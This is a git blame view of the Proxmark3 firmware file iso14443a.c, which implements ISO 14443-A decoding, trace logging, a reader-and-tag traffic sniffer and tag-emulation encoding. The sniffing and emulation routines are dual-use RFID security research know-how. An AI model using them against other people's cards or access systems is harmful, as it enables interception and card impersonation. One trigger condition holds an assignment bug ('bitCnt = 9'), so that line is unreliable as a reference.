]> git.zerfleddert.de Git - proxmark3-svn/blame - armsrc/iso14443a.c
Attempt to use raw writing capabilities via scripting engine. Not functional yet
[proxmark3-svn] / armsrc / iso14443a.c
CommitLineData
15c4dc5a 1//-----------------------------------------------------------------------------
b62a5a84 2// Merlok - June 2011, 2012
15c4dc5a 3// Gerhard de Koning Gans - May 2008
534983d7 4// Hagen Fritsch - June 2010
bd20f8f4 5//
6// This code is licensed to you under the terms of the GNU GPL, version 2 or,
7// at your option, any later version. See the LICENSE.txt file for the text of
8// the license.
15c4dc5a 9//-----------------------------------------------------------------------------
bd20f8f4 10// Routines to support ISO 14443 type A.
11//-----------------------------------------------------------------------------
12
e30c654b 13#include "proxmark3.h"
15c4dc5a 14#include "apps.h"
f7e3ed82 15#include "util.h"
9ab7a6c7 16#include "string.h"
902cb3c0 17#include "cmd.h"
9ab7a6c7 18
15c4dc5a 19#include "iso14443crc.h"
534983d7 20#include "iso14443a.h"
20f9a2a1
M
21#include "crapto1.h"
22#include "mifareutil.h"
15c4dc5a 23
534983d7 24static uint32_t iso14a_timeout;
d19929cb 25uint8_t *trace = (uint8_t *) BigBuf+TRACE_OFFSET;
1e262141 26int traceLen = 0;
27int rsamples = 0;
28int tracing = TRUE;
29uint8_t trigger = 0;
b0127e65 30// the block number for the ISO14443-4 PCB
31static uint8_t iso14_pcb_blocknum = 0;
15c4dc5a 32
8f51ddb0 33// CARD TO READER - manchester
72934aa3 34// Sequence D: 11110000 modulation with subcarrier during first half
35// Sequence E: 00001111 modulation with subcarrier during second half
36// Sequence F: 00000000 no modulation with subcarrier
8f51ddb0 37// READER TO CARD - miller
72934aa3 38// Sequence X: 00001100 drop after half a period
39// Sequence Y: 00000000 no drop
40// Sequence Z: 11000000 drop at start
41#define SEC_D 0xf0
42#define SEC_E 0x0f
43#define SEC_F 0x00
44#define SEC_X 0x0c
45#define SEC_Y 0x00
46#define SEC_Z 0xc0
15c4dc5a 47
1e262141 48const uint8_t OddByteParity[256] = {
15c4dc5a 49 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
50 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
51 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
52 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
53 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
54 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
55 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
56 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
57 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
58 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
59 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
60 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
61 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1,
62 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
63 0, 1, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0,
64 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1
65};
66
1e262141 67
902cb3c0 68void iso14a_set_trigger(bool enable) {
534983d7 69 trigger = enable;
70}
71
902cb3c0 72void iso14a_clear_trace() {
73 memset(trace, 0x44, TRACE_SIZE);
8556b852
M
74 traceLen = 0;
75}
d19929cb 76
902cb3c0 77void iso14a_set_tracing(bool enable) {
8556b852
M
78 tracing = enable;
79}
d19929cb 80
b0127e65 81void iso14a_set_timeout(uint32_t timeout) {
82 iso14a_timeout = timeout;
83}
8556b852 84
15c4dc5a 85//-----------------------------------------------------------------------------
86// Generate the parity value for a byte sequence
e30c654b 87//
15c4dc5a 88//-----------------------------------------------------------------------------
20f9a2a1
M
89byte_t oddparity (const byte_t bt)
90{
91 return OddByteParity[bt];
92}
93
f7e3ed82 94uint32_t GetParity(const uint8_t * pbtCmd, int iLen)
15c4dc5a 95{
96 int i;
f7e3ed82 97 uint32_t dwPar = 0;
72934aa3 98
15c4dc5a 99 // Generate the encrypted data
100 for (i = 0; i < iLen; i++) {
101 // Save the encrypted parity bit
102 dwPar |= ((OddByteParity[pbtCmd[i]]) << i);
103 }
104 return dwPar;
105}
106
534983d7 107void AppendCrc14443a(uint8_t* data, int len)
15c4dc5a 108{
109 ComputeCrc14443(CRC_14443_A,data,len,data+len,data+len+1);
110}
111
1e262141 112// The function LogTrace() is also used by the iClass implementation in iClass.c
5cd9ec01 113int RAMFUNC LogTrace(const uint8_t * btBytes, int iLen, int iSamples, uint32_t dwParity, int bReader)
15c4dc5a 114{
115 // Return when trace is full
81cd0474 116 if (traceLen >= TRACE_SIZE) return FALSE;
e30c654b 117
15c4dc5a 118 // Trace the random, i'm curious
119 rsamples += iSamples;
120 trace[traceLen++] = ((rsamples >> 0) & 0xff);
121 trace[traceLen++] = ((rsamples >> 8) & 0xff);
122 trace[traceLen++] = ((rsamples >> 16) & 0xff);
123 trace[traceLen++] = ((rsamples >> 24) & 0xff);
124 if (!bReader) {
125 trace[traceLen - 1] |= 0x80;
126 }
127 trace[traceLen++] = ((dwParity >> 0) & 0xff);
128 trace[traceLen++] = ((dwParity >> 8) & 0xff);
129 trace[traceLen++] = ((dwParity >> 16) & 0xff);
130 trace[traceLen++] = ((dwParity >> 24) & 0xff);
131 trace[traceLen++] = iLen;
132 memcpy(trace + traceLen, btBytes, iLen);
133 traceLen += iLen;
134 return TRUE;
135}
136
15c4dc5a 137//-----------------------------------------------------------------------------
138// The software UART that receives commands from the reader, and its state
139// variables.
140//-----------------------------------------------------------------------------
b62a5a84 141static tUart Uart;
15c4dc5a 142
6c1e2d95 143static RAMFUNC int MillerDecoding(int bit)
15c4dc5a 144{
9f693930 145 //int error = 0;
15c4dc5a 146 int bitright;
147
148 if(!Uart.bitBuffer) {
149 Uart.bitBuffer = bit ^ 0xFF0;
150 return FALSE;
151 }
152 else {
153 Uart.bitBuffer <<= 4;
154 Uart.bitBuffer ^= bit;
155 }
156
f7e3ed82 157 int EOC = FALSE;
15c4dc5a 158
159 if(Uart.state != STATE_UNSYNCD) {
160 Uart.posCnt++;
161
162 if((Uart.bitBuffer & Uart.syncBit) ^ Uart.syncBit) {
163 bit = 0x00;
164 }
165 else {
166 bit = 0x01;
167 }
168 if(((Uart.bitBuffer << 1) & Uart.syncBit) ^ Uart.syncBit) {
169 bitright = 0x00;
170 }
171 else {
172 bitright = 0x01;
173 }
174 if(bit != bitright) { bit = bitright; }
175
176 if(Uart.posCnt == 1) {
177 // measurement first half bitperiod
178 if(!bit) {
179 Uart.drop = DROP_FIRST_HALF;
180 }
181 }
182 else {
183 // measurement second half bitperiod
184 if(!bit & (Uart.drop == DROP_NONE)) {
185 Uart.drop = DROP_SECOND_HALF;
186 }
187 else if(!bit) {
188 // measured a drop in first and second half
189 // which should not be possible
190 Uart.state = STATE_ERROR_WAIT;
9f693930 191 //error = 0x01;
15c4dc5a 192 }
193
194 Uart.posCnt = 0;
195
196 switch(Uart.state) {
197 case STATE_START_OF_COMMUNICATION:
198 Uart.shiftReg = 0;
199 if(Uart.drop == DROP_SECOND_HALF) {
200 // error, should not happen in SOC
201 Uart.state = STATE_ERROR_WAIT;
9f693930 202 //error = 0x02;
15c4dc5a 203 }
204 else {
205 // correct SOC
206 Uart.state = STATE_MILLER_Z;
207 }
208 break;
209
210 case STATE_MILLER_Z:
211 Uart.bitCnt++;
212 Uart.shiftReg >>= 1;
213 if(Uart.drop == DROP_NONE) {
214 // logic '0' followed by sequence Y
215 // end of communication
216 Uart.state = STATE_UNSYNCD;
217 EOC = TRUE;
218 }
219 // if(Uart.drop == DROP_FIRST_HALF) {
220 // Uart.state = STATE_MILLER_Z; stay the same
221 // we see a logic '0' }
222 if(Uart.drop == DROP_SECOND_HALF) {
223 // we see a logic '1'
224 Uart.shiftReg |= 0x100;
225 Uart.state = STATE_MILLER_X;
226 }
227 break;
228
229 case STATE_MILLER_X:
230 Uart.shiftReg >>= 1;
231 if(Uart.drop == DROP_NONE) {
232 // sequence Y, we see a '0'
233 Uart.state = STATE_MILLER_Y;
234 Uart.bitCnt++;
235 }
236 if(Uart.drop == DROP_FIRST_HALF) {
237 // Would be STATE_MILLER_Z
238 // but Z does not follow X, so error
239 Uart.state = STATE_ERROR_WAIT;
9f693930 240 //error = 0x03;
15c4dc5a 241 }
242 if(Uart.drop == DROP_SECOND_HALF) {
243 // We see a '1' and stay in state X
244 Uart.shiftReg |= 0x100;
245 Uart.bitCnt++;
246 }
247 break;
248
249 case STATE_MILLER_Y:
250 Uart.bitCnt++;
251 Uart.shiftReg >>= 1;
252 if(Uart.drop == DROP_NONE) {
253 // logic '0' followed by sequence Y
254 // end of communication
255 Uart.state = STATE_UNSYNCD;
256 EOC = TRUE;
257 }
258 if(Uart.drop == DROP_FIRST_HALF) {
259 // we see a '0'
260 Uart.state = STATE_MILLER_Z;
261 }
262 if(Uart.drop == DROP_SECOND_HALF) {
263 // We see a '1' and go to state X
264 Uart.shiftReg |= 0x100;
265 Uart.state = STATE_MILLER_X;
266 }
267 break;
268
269 case STATE_ERROR_WAIT:
270 // That went wrong. Now wait for at least two bit periods
271 // and try to sync again
272 if(Uart.drop == DROP_NONE) {
273 Uart.highCnt = 6;
274 Uart.state = STATE_UNSYNCD;
275 }
276 break;
277
278 default:
279 Uart.state = STATE_UNSYNCD;
280 Uart.highCnt = 0;
281 break;
282 }
283
284 Uart.drop = DROP_NONE;
285
286 // should have received at least one whole byte...
287 if((Uart.bitCnt == 2) && EOC && (Uart.byteCnt > 0)) {
288 return TRUE;
289 }
290
291 if(Uart.bitCnt == 9) {
292 Uart.output[Uart.byteCnt] = (Uart.shiftReg & 0xff);
293 Uart.byteCnt++;
294
295 Uart.parityBits <<= 1;
296 Uart.parityBits ^= ((Uart.shiftReg >> 8) & 0x01);
297
298 if(EOC) {
299 // when End of Communication received and
300 // all data bits processed..
301 return TRUE;
302 }
303 Uart.bitCnt = 0;
304 }
305
306 /*if(error) {
307 Uart.output[Uart.byteCnt] = 0xAA;
308 Uart.byteCnt++;
309 Uart.output[Uart.byteCnt] = error & 0xFF;
310 Uart.byteCnt++;
311 Uart.output[Uart.byteCnt] = 0xAA;
312 Uart.byteCnt++;
313 Uart.output[Uart.byteCnt] = (Uart.bitBuffer >> 8) & 0xFF;
314 Uart.byteCnt++;
315 Uart.output[Uart.byteCnt] = Uart.bitBuffer & 0xFF;
316 Uart.byteCnt++;
317 Uart.output[Uart.byteCnt] = (Uart.syncBit >> 3) & 0xFF;
318 Uart.byteCnt++;
319 Uart.output[Uart.byteCnt] = 0xAA;
320 Uart.byteCnt++;
321 return TRUE;
322 }*/
323 }
324
325 }
326 else {
327 bit = Uart.bitBuffer & 0xf0;
328 bit >>= 4;
329 bit ^= 0x0F;
330 if(bit) {
331 // should have been high or at least (4 * 128) / fc
332 // according to ISO this should be at least (9 * 128 + 20) / fc
333 if(Uart.highCnt == 8) {
334 // we went low, so this could be start of communication
335 // it turns out to be safer to choose a less significant
336 // syncbit... so we check whether the neighbour also represents the drop
337 Uart.posCnt = 1; // apparently we are busy with our first half bit period
338 Uart.syncBit = bit & 8;
339 Uart.samples = 3;
340 if(!Uart.syncBit) { Uart.syncBit = bit & 4; Uart.samples = 2; }
341 else if(bit & 4) { Uart.syncBit = bit & 4; Uart.samples = 2; bit <<= 2; }
342 if(!Uart.syncBit) { Uart.syncBit = bit & 2; Uart.samples = 1; }
343 else if(bit & 2) { Uart.syncBit = bit & 2; Uart.samples = 1; bit <<= 1; }
344 if(!Uart.syncBit) { Uart.syncBit = bit & 1; Uart.samples = 0;
2f2d9fc5 345 if(Uart.syncBit && (Uart.bitBuffer & 8)) {
15c4dc5a 346 Uart.syncBit = 8;
347
348 // the first half bit period is expected in next sample
349 Uart.posCnt = 0;
350 Uart.samples = 3;
351 }
352 }
353 else if(bit & 1) { Uart.syncBit = bit & 1; Uart.samples = 0; }
354
355 Uart.syncBit <<= 4;
356 Uart.state = STATE_START_OF_COMMUNICATION;
357 Uart.drop = DROP_FIRST_HALF;
358 Uart.bitCnt = 0;
359 Uart.byteCnt = 0;
360 Uart.parityBits = 0;
9f693930 361 //error = 0;
15c4dc5a 362 }
363 else {
364 Uart.highCnt = 0;
365 }
366 }
367 else {
368 if(Uart.highCnt < 8) {
369 Uart.highCnt++;
370 }
371 }
372 }
373
374 return FALSE;
375}
376
377//=============================================================================
378// ISO 14443 Type A - Manchester
379//=============================================================================
b62a5a84 380static tDemod Demod;
15c4dc5a 381
6c1e2d95 382static RAMFUNC int ManchesterDecoding(int v)
15c4dc5a 383{
384 int bit;
385 int modulation;
9f693930 386 //int error = 0;
15c4dc5a 387
388 if(!Demod.buff) {
389 Demod.buff = 1;
390 Demod.buffer = v;
391 return FALSE;
392 }
393 else {
394 bit = Demod.buffer;
395 Demod.buffer = v;
396 }
397
398 if(Demod.state==DEMOD_UNSYNCD) {
399 Demod.output[Demod.len] = 0xfa;
400 Demod.syncBit = 0;
401 //Demod.samples = 0;
402 Demod.posCount = 1; // This is the first half bit period, so after syncing handle the second part
2f2d9fc5 403
404 if(bit & 0x08) {
405 Demod.syncBit = 0x08;
15c4dc5a 406 }
15c4dc5a 407
2f2d9fc5 408 if(bit & 0x04) {
409 if(Demod.syncBit) {
410 bit <<= 4;
411 }
412 Demod.syncBit = 0x04;
413 }
15c4dc5a 414
2f2d9fc5 415 if(bit & 0x02) {
416 if(Demod.syncBit) {
417 bit <<= 2;
15c4dc5a 418 }
2f2d9fc5 419 Demod.syncBit = 0x02;
15c4dc5a 420 }
15c4dc5a 421
593924e7 422 if(bit & 0x01 && Demod.syncBit) {
2f2d9fc5 423 Demod.syncBit = 0x01;
424 }
425
15c4dc5a 426 if(Demod.syncBit) {
427 Demod.len = 0;
428 Demod.state = DEMOD_START_OF_COMMUNICATION;
429 Demod.sub = SUB_FIRST_HALF;
430 Demod.bitCount = 0;
431 Demod.shiftReg = 0;
432 Demod.parityBits = 0;
433 Demod.samples = 0;
434 if(Demod.posCount) {
534983d7 435 if(trigger) LED_A_OFF();
15c4dc5a 436 switch(Demod.syncBit) {
437 case 0x08: Demod.samples = 3; break;
438 case 0x04: Demod.samples = 2; break;
439 case 0x02: Demod.samples = 1; break;
440 case 0x01: Demod.samples = 0; break;
441 }
442 }
9f693930 443 //error = 0;
15c4dc5a 444 }
445 }
446 else {
447 //modulation = bit & Demod.syncBit;
448 modulation = ((bit << 1) ^ ((Demod.buffer & 0x08) >> 3)) & Demod.syncBit;
449
450 Demod.samples += 4;
451
452 if(Demod.posCount==0) {
453 Demod.posCount = 1;
454 if(modulation) {
455 Demod.sub = SUB_FIRST_HALF;
456 }
457 else {
458 Demod.sub = SUB_NONE;
459 }
460 }
461 else {
462 Demod.posCount = 0;
463 if(modulation && (Demod.sub == SUB_FIRST_HALF)) {
464 if(Demod.state!=DEMOD_ERROR_WAIT) {
465 Demod.state = DEMOD_ERROR_WAIT;
466 Demod.output[Demod.len] = 0xaa;
9f693930 467 //error = 0x01;
15c4dc5a 468 }
469 }
470 else if(modulation) {
471 Demod.sub = SUB_SECOND_HALF;
472 }
473
474 switch(Demod.state) {
475 case DEMOD_START_OF_COMMUNICATION:
476 if(Demod.sub == SUB_FIRST_HALF) {
477 Demod.state = DEMOD_MANCHESTER_D;
478 }
479 else {
480 Demod.output[Demod.len] = 0xab;
481 Demod.state = DEMOD_ERROR_WAIT;
9f693930 482 //error = 0x02;
15c4dc5a 483 }
484 break;
485
486 case DEMOD_MANCHESTER_D:
487 case DEMOD_MANCHESTER_E:
488 if(Demod.sub == SUB_FIRST_HALF) {
489 Demod.bitCount++;
490 Demod.shiftReg = (Demod.shiftReg >> 1) ^ 0x100;
491 Demod.state = DEMOD_MANCHESTER_D;
492 }
493 else if(Demod.sub == SUB_SECOND_HALF) {
494 Demod.bitCount++;
495 Demod.shiftReg >>= 1;
496 Demod.state = DEMOD_MANCHESTER_E;
497 }
498 else {
499 Demod.state = DEMOD_MANCHESTER_F;
500 }
501 break;
502
503 case DEMOD_MANCHESTER_F:
504 // Tag response does not need to be a complete byte!
505 if(Demod.len > 0 || Demod.bitCount > 0) {
506 if(Demod.bitCount > 0) {
507 Demod.shiftReg >>= (9 - Demod.bitCount);
508 Demod.output[Demod.len] = Demod.shiftReg & 0xff;
509 Demod.len++;
510 // No parity bit, so just shift a 0
511 Demod.parityBits <<= 1;
512 }
513
514 Demod.state = DEMOD_UNSYNCD;
515 return TRUE;
516 }
517 else {
518 Demod.output[Demod.len] = 0xad;
519 Demod.state = DEMOD_ERROR_WAIT;
9f693930 520 //error = 0x03;
15c4dc5a 521 }
522 break;
523
524 case DEMOD_ERROR_WAIT:
525 Demod.state = DEMOD_UNSYNCD;
526 break;
527
528 default:
529 Demod.output[Demod.len] = 0xdd;
530 Demod.state = DEMOD_UNSYNCD;
531 break;
532 }
533
534 if(Demod.bitCount>=9) {
535 Demod.output[Demod.len] = Demod.shiftReg & 0xff;
536 Demod.len++;
537
538 Demod.parityBits <<= 1;
539 Demod.parityBits ^= ((Demod.shiftReg >> 8) & 0x01);
540
541 Demod.bitCount = 0;
542 Demod.shiftReg = 0;
543 }
544
545 /*if(error) {
546 Demod.output[Demod.len] = 0xBB;
547 Demod.len++;
548 Demod.output[Demod.len] = error & 0xFF;
549 Demod.len++;
550 Demod.output[Demod.len] = 0xBB;
551 Demod.len++;
552 Demod.output[Demod.len] = bit & 0xFF;
553 Demod.len++;
554 Demod.output[Demod.len] = Demod.buffer & 0xFF;
555 Demod.len++;
556 Demod.output[Demod.len] = Demod.syncBit & 0xFF;
557 Demod.len++;
558 Demod.output[Demod.len] = 0xBB;
559 Demod.len++;
560 return TRUE;
561 }*/
562
563 }
564
565 } // end (state != UNSYNCED)
566
567 return FALSE;
568}
569
570//=============================================================================
571// Finally, a `sniffer' for ISO 14443 Type A
572// Both sides of communication!
573//=============================================================================
574
575//-----------------------------------------------------------------------------
576// Record the sequence of commands sent by the reader to the tag, with
577// triggering so that we start recording at the point that the tag is moved
578// near the reader.
579//-----------------------------------------------------------------------------
5cd9ec01
M
580void RAMFUNC SnoopIso14443a(uint8_t param) {
581 // param:
582 // bit 0 - trigger from first card answer
583 // bit 1 - trigger from first reader 7-bit request
584
585 LEDsoff();
586 // init trace buffer
d19929cb 587 iso14a_clear_trace();
5cd9ec01
M
588
589 // We won't start recording the frames that we acquire until we trigger;
590 // a good trigger condition to get started is probably when we see a
591 // response from the tag.
592 // triggered == FALSE -- to wait first for card
593 int triggered = !(param & 0x03);
594
595 // The command (reader -> tag) that we're receiving.
15c4dc5a 596 // The length of a received command will in most cases be no more than 18 bytes.
597 // So 32 should be enough!
5cd9ec01
M
598 uint8_t *receivedCmd = (((uint8_t *)BigBuf) + RECV_CMD_OFFSET);
599 // The response (tag -> reader) that we're receiving.
600 uint8_t *receivedResponse = (((uint8_t *)BigBuf) + RECV_RES_OFFSET);
15c4dc5a 601
5cd9ec01
M
602 // As we receive stuff, we copy it from receivedCmd or receivedResponse
603 // into trace, along with its length and other annotations.
604 //uint8_t *trace = (uint8_t *)BigBuf;
605
606 // The DMA buffer, used to stream samples from the FPGA
607 int8_t *dmaBuf = ((int8_t *)BigBuf) + DMA_BUFFER_OFFSET;
608 int8_t *data = dmaBuf;
609 int maxDataLen = 0;
610 int dataLen = 0;
15c4dc5a 611
5cd9ec01
M
612 // Set up the demodulator for tag -> reader responses.
613 Demod.output = receivedResponse;
614 Demod.len = 0;
615 Demod.state = DEMOD_UNSYNCD;
15c4dc5a 616
5cd9ec01
M
617 // Set up the demodulator for the reader -> tag commands
618 memset(&Uart, 0, sizeof(Uart));
619 Uart.output = receivedCmd;
620 Uart.byteCntMax = 32; // was 100 (greg)//////////////////
621 Uart.state = STATE_UNSYNCD;
15c4dc5a 622
5cd9ec01
M
623 // Setup for the DMA.
624 FpgaSetupSsc();
625 FpgaSetupSscDma((uint8_t *)dmaBuf, DMA_BUFFER_SIZE);
15c4dc5a 626
5cd9ec01
M
627 // And put the FPGA in the appropriate mode
628 // Signal field is off with the appropriate LED
629 LED_D_OFF();
630 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_SNIFFER);
631 SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
7e758047 632
5cd9ec01
M
633 // Count of samples received so far, so that we can include timing
634 // information in the trace buffer.
635 rsamples = 0;
636 // And now we loop, receiving samples.
637 while(true) {
638 if(BUTTON_PRESS()) {
639 DbpString("cancelled by button");
640 goto done;
641 }
15c4dc5a 642
5cd9ec01
M
643 LED_A_ON();
644 WDT_HIT();
15c4dc5a 645
5cd9ec01
M
646 int register readBufDataP = data - dmaBuf;
647 int register dmaBufDataP = DMA_BUFFER_SIZE - AT91C_BASE_PDC_SSC->PDC_RCR;
648 if (readBufDataP <= dmaBufDataP){
649 dataLen = dmaBufDataP - readBufDataP;
650 } else {
651 dataLen = DMA_BUFFER_SIZE - readBufDataP + dmaBufDataP + 1;
652 }
653 // test for length of buffer
654 if(dataLen > maxDataLen) {
655 maxDataLen = dataLen;
656 if(dataLen > 400) {
657 Dbprintf("blew circular buffer! dataLen=0x%x", dataLen);
658 goto done;
659 }
660 }
661 if(dataLen < 1) continue;
662
663 // primary buffer was stopped( <-- we lost data!
664 if (!AT91C_BASE_PDC_SSC->PDC_RCR) {
665 AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) dmaBuf;
666 AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
5cd9ec01
M
667 }
668 // secondary buffer sets as primary, secondary buffer was stopped
669 if (!AT91C_BASE_PDC_SSC->PDC_RNCR) {
670 AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t) dmaBuf;
671 AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
672 }
673
674 LED_A_OFF();
675
676 rsamples += 4;
677 if(MillerDecoding((data[0] & 0xF0) >> 4)) {
678 LED_C_ON();
679
680 // check - if there is a short 7bit request from reader
681 if ((!triggered) && (param & 0x02) && (Uart.byteCnt == 1) && (Uart.bitCnt = 9)) triggered = TRUE;
682
683 if(triggered) {
684 if (!LogTrace(receivedCmd, Uart.byteCnt, 0 - Uart.samples, Uart.parityBits, TRUE)) break;
685 }
686 /* And ready to receive another command. */
687 Uart.state = STATE_UNSYNCD;
688 /* And also reset the demod code, which might have been */
689 /* false-triggered by the commands from the reader. */
690 Demod.state = DEMOD_UNSYNCD;
691 LED_B_OFF();
692 }
693
694 if(ManchesterDecoding(data[0] & 0x0F)) {
695 LED_B_ON();
696
697 if (!LogTrace(receivedResponse, Demod.len, 0 - Demod.samples, Demod.parityBits, FALSE)) break;
698
699 if ((!triggered) && (param & 0x01)) triggered = TRUE;
700
701 // And ready to receive another response.
702 memset(&Demod, 0, sizeof(Demod));
703 Demod.output = receivedResponse;
704 Demod.state = DEMOD_UNSYNCD;
705 LED_C_OFF();
706 }
707
708 data++;
709 if(data > dmaBuf + DMA_BUFFER_SIZE) {
710 data = dmaBuf;
711 }
712 } // main cycle
713
714 DbpString("COMMAND FINISHED");
15c4dc5a 715
15c4dc5a 716done:
5cd9ec01
M
717 AT91C_BASE_PDC_SSC->PDC_PTCR = AT91C_PDC_RXTDIS;
718 Dbprintf("maxDataLen=%x, Uart.state=%x, Uart.byteCnt=%x", maxDataLen, Uart.state, Uart.byteCnt);
719 Dbprintf("Uart.byteCntMax=%x, traceLen=%x, Uart.output[0]=%08x", Uart.byteCntMax, traceLen, (int)Uart.output[0]);
720 LEDsoff();
15c4dc5a 721}
722
15c4dc5a 723//-----------------------------------------------------------------------------
724// Prepare tag messages
725//-----------------------------------------------------------------------------
8f51ddb0 726static void CodeIso14443aAsTagPar(const uint8_t *cmd, int len, uint32_t dwParity)
15c4dc5a 727{
8f51ddb0 728 int i;
15c4dc5a 729
8f51ddb0 730 ToSendReset();
15c4dc5a 731
732 // Correction bit, might be removed when not needed
733 ToSendStuffBit(0);
734 ToSendStuffBit(0);
735 ToSendStuffBit(0);
736 ToSendStuffBit(0);
737 ToSendStuffBit(1); // 1
738 ToSendStuffBit(0);
739 ToSendStuffBit(0);
740 ToSendStuffBit(0);
8f51ddb0 741
15c4dc5a 742 // Send startbit
72934aa3 743 ToSend[++ToSendMax] = SEC_D;
15c4dc5a 744
8f51ddb0
M
745 for(i = 0; i < len; i++) {
746 int j;
747 uint8_t b = cmd[i];
15c4dc5a 748
749 // Data bits
15c4dc5a 750 for(j = 0; j < 8; j++) {
15c4dc5a 751 if(b & 1) {
72934aa3 752 ToSend[++ToSendMax] = SEC_D;
15c4dc5a 753 } else {
72934aa3 754 ToSend[++ToSendMax] = SEC_E;
8f51ddb0
M
755 }
756 b >>= 1;
757 }
15c4dc5a 758
0014cb46 759 // Get the parity bit
8f51ddb0
M
760 if ((dwParity >> i) & 0x01) {
761 ToSend[++ToSendMax] = SEC_D;
15c4dc5a 762 } else {
72934aa3 763 ToSend[++ToSendMax] = SEC_E;
15c4dc5a 764 }
8f51ddb0 765 }
15c4dc5a 766
8f51ddb0
M
767 // Send stopbit
768 ToSend[++ToSendMax] = SEC_F;
15c4dc5a 769
8f51ddb0
M
770 // Convert from last byte pos to length
771 ToSendMax++;
8f51ddb0
M
772}
773
774static void CodeIso14443aAsTag(const uint8_t *cmd, int len){
775 CodeIso14443aAsTagPar(cmd, len, GetParity(cmd, len));
15c4dc5a 776}
777
778//-----------------------------------------------------------------------------
779// This is to send a NACK kind of answer, its only 3 bits, I know it should be 4
780//-----------------------------------------------------------------------------
8f51ddb0 781static void CodeStrangeAnswerAsTag()
15c4dc5a 782{
783 int i;
784
785 ToSendReset();
786
787 // Correction bit, might be removed when not needed
788 ToSendStuffBit(0);
789 ToSendStuffBit(0);
790 ToSendStuffBit(0);
791 ToSendStuffBit(0);
792 ToSendStuffBit(1); // 1
793 ToSendStuffBit(0);
794 ToSendStuffBit(0);
795 ToSendStuffBit(0);
796
797 // Send startbit
72934aa3 798 ToSend[++ToSendMax] = SEC_D;
15c4dc5a 799
800 // 0
72934aa3 801 ToSend[++ToSendMax] = SEC_E;
15c4dc5a 802
803 // 0
72934aa3 804 ToSend[++ToSendMax] = SEC_E;
15c4dc5a 805
806 // 1
72934aa3 807 ToSend[++ToSendMax] = SEC_D;
15c4dc5a 808
809 // Send stopbit
72934aa3 810 ToSend[++ToSendMax] = SEC_F;
15c4dc5a 811
812 // Flush the buffer in FPGA!!
813 for(i = 0; i < 5; i++) {
72934aa3 814 ToSend[++ToSendMax] = SEC_F;
15c4dc5a 815 }
816
817 // Convert from last byte pos to length
818 ToSendMax++;
8f51ddb0 819}
15c4dc5a 820
8f51ddb0
M
821static void Code4bitAnswerAsTag(uint8_t cmd)
822{
823 int i;
824
825 ToSendReset();
826
827 // Correction bit, might be removed when not needed
828 ToSendStuffBit(0);
829 ToSendStuffBit(0);
830 ToSendStuffBit(0);
831 ToSendStuffBit(0);
832 ToSendStuffBit(1); // 1
833 ToSendStuffBit(0);
834 ToSendStuffBit(0);
835 ToSendStuffBit(0);
836
837 // Send startbit
838 ToSend[++ToSendMax] = SEC_D;
839
840 uint8_t b = cmd;
841 for(i = 0; i < 4; i++) {
842 if(b & 1) {
843 ToSend[++ToSendMax] = SEC_D;
844 } else {
845 ToSend[++ToSendMax] = SEC_E;
846 }
847 b >>= 1;
848 }
849
850 // Send stopbit
851 ToSend[++ToSendMax] = SEC_F;
852
853 // Flush the buffer in FPGA!!
854 for(i = 0; i < 5; i++) {
855 ToSend[++ToSendMax] = SEC_F;
856 }
857
858 // Convert from last byte pos to length
859 ToSendMax++;
15c4dc5a 860}
861
862//-----------------------------------------------------------------------------
863// Wait for commands from reader
864// Stop when button is pressed
865// Or return TRUE when command is captured
866//-----------------------------------------------------------------------------
f7e3ed82 867static int GetIso14443aCommandFromReader(uint8_t *received, int *len, int maxLen)
15c4dc5a 868{
869 // Set FPGA mode to "simulated ISO 14443 tag", no modulation (listen
870 // only, since we are receiving, not transmitting).
871 // Signal field is off with the appropriate LED
872 LED_D_OFF();
873 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_TAGSIM_LISTEN);
874
875 // Now run a `software UART' on the stream of incoming samples.
876 Uart.output = received;
877 Uart.byteCntMax = maxLen;
878 Uart.state = STATE_UNSYNCD;
879
880 for(;;) {
881 WDT_HIT();
882
883 if(BUTTON_PRESS()) return FALSE;
884
885 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_TXRDY)) {
886 AT91C_BASE_SSC->SSC_THR = 0x00;
887 }
888 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_RXRDY)) {
f7e3ed82 889 uint8_t b = (uint8_t)AT91C_BASE_SSC->SSC_RHR;
15c4dc5a 890 if(MillerDecoding((b & 0xf0) >> 4)) {
891 *len = Uart.byteCnt;
892 return TRUE;
893 }
894 if(MillerDecoding(b & 0x0f)) {
895 *len = Uart.byteCnt;
896 return TRUE;
897 }
898 }
899 }
900}
28afbd2b 901
9ca155ba 902static int EmSendCmd14443aRaw(uint8_t *resp, int respLen, int correctionNeeded);
